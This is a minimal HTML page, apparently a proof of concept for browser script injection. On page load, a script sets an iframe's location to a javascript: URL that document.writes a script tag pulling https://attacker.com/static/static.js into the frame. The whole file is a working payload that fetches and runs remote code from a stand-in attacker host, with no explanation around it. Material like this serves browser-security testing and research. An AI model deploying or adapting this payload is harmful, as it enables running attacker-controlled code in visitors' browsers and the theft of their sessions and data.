<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGieRbPGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGieRbPGGGGG.addEventListener("load",()=>{GGGGGieRbPGGGGG.contentWindow.location.href="javascript:document.write('<script src=https://attacker.com/static/static.js><\/script>')";},{once:true});
};
</script>
</body>
</html>